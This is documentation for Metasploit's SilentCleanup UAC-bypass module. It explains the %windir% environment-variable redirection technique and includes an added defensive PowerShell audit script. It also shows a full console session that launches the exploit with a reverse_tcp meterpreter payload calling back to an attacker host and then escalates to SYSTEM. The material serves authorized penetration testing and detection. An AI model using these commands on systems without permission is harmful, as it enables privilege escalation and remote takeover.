
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md

Introduction

This module bypasses UAC on any Windows installation that has PowerShell installed.

Windows Task Scheduler contains a task named "SilentCleanup" which, although it runs under the Users group, is configured to run with elevated privileges. When it fires, it executes %windir%\system32\cleanmgr.exe. Because the task runs as Users and a user controls their own environment variables, %windir% (normally C:\Windows) can be redirected to a location of the user's choosing, and whatever cleanmgr.exe is found there runs as administrator. For this to work the code must be saved in a script file on disk; it cannot be run directly from PowerShell or from the Run dialog.
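From a defender's side, the technique described above leaves two things to check: whether the SilentCleanup task is still configured to run elevated with a %windir%-relative action, and whether any user profile carries a per-user windir environment override that differs from the real system root. The PowerShell script below is an added example written for this page, not code from the Metasploit module; it assumes an elevated PowerShell 5.1 or later session on Windows 10/11 with the ScheduledTasks module available, and that the task lives at its default path \Microsoft\Windows\DiskCleanup\.

```powershell
# Added example (not part of the Metasploit module): audit a host for the
# conditions this UAC bypass relies on. Assumes an elevated PowerShell session
# and the default task path for SilentCleanup.

$taskPath = '\Microsoft\Windows\DiskCleanup\'
$taskName = 'SilentCleanup'

function Get-SilentCleanupTaskInfo {
    # Returns the task's run level and its actions, or $null if the task is absent.
    $task = Get-ScheduledTask -TaskPath $taskPath -TaskName $taskName -ErrorAction SilentlyContinue
    if (-not $task) { return $null }
    [pscustomobject]@{
        State    = $task.State
        RunLevel = $task.Principal.RunLevel
        UserId   = $task.Principal.UserId
        Actions  = @($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() })
    }
}

function Get-UserWindirOverrides {
    # Per-user environment variables live under HKU\<SID>\Environment. A 'windir'
    # value there that does not match the real system root is the artifact this
    # technique leaves behind, so report every loaded profile that has one.
    $realRoot = $env:SystemRoot
    Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notmatch '_Classes$' } |
        ForEach-Object {
            $envKey = Join-Path $_.PSPath 'Environment'
            $props  = Get-ItemProperty -Path $envKey -ErrorAction SilentlyContinue
            if ($props -and $props.PSObject.Properties['windir']) {
                [pscustomobject]@{
                    Sid        = $_.PSChildName
                    Windir     = $props.windir
                    Suspicious = ($props.windir -ne $realRoot)
                }
            }
        }
}

$info = Get-SilentCleanupTaskInfo
if ($info) {
    Write-Output "SilentCleanup: State=$($info.State) RunLevel=$($info.RunLevel) UserId=$($info.UserId)"
    $info.Actions | ForEach-Object { Write-Output "  Action: $_" }
    if ($info.RunLevel -eq 'Highest' -and (($info.Actions -join ' ') -match '%windir%')) {
        Write-Output "  Note: task runs elevated and resolves %windir% from the calling user's environment."
    }
} else {
    Write-Output 'SilentCleanup task not found at the default path.'
}

$overrides = @(Get-UserWindirOverrides)
if ($overrides.Count -eq 0) {
    Write-Output "No per-user 'windir' environment overrides found."
} else {
    $overrides | Format-Table -AutoSize
}
```

Only profiles whose hives are currently loaded appear under HKEY_USERS, so run this while the users of interest are logged on or load their NTUSER.DAT first. For continuous monitoring, a registry value-set event on any `...\Environment\windir` value (for example Sysmon event ID 13) is a cheap and specific signal, since legitimate software has no reason to define windir per user.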

Usage

  1. Create a session on the target system under the context of a local administrative user.

  2. Begin interacting with the module: use exploit/windows/local/bypassuac_silentcleanup.

  3. Set the PAYLOAD and configure it correctly, making sure the architecture is correct.

  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true.

  5. Make sure that the SESSION value is set to the existing session identifier.

  6. Invoke the module: run.

Scenarios

```
msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  6         meterpreter x86/windows  DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP   192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x)

msf5 > use exploit/windows/local/bypassuac_silentcleanup
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf5 exploit(windows/local/bypassuac_silentcleanup) > options

Module options (exploit/windows/local/bypassuac_silentcleanup):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION    6                yes       The session to run this module on.
   SLEEPTIME  0                no        The time (ms) to sleep before running SilentCleanup


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.55     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 exploit(windows/local/bypassuac_silentcleanup) > run

[*] Started reverse TCP handler on 192.168.1.xx:4444
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 192.168.1.x
[*] Meterpreter session 10 opened (192.168.1.xx:4444 -> 192.168.1.x:55538) at 2019-06-20 15:00:14 -0400

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > bg
[*] Backgrounding session 10...
msf5 exploit(windows/local/bypassuac_silentcleanup) >
```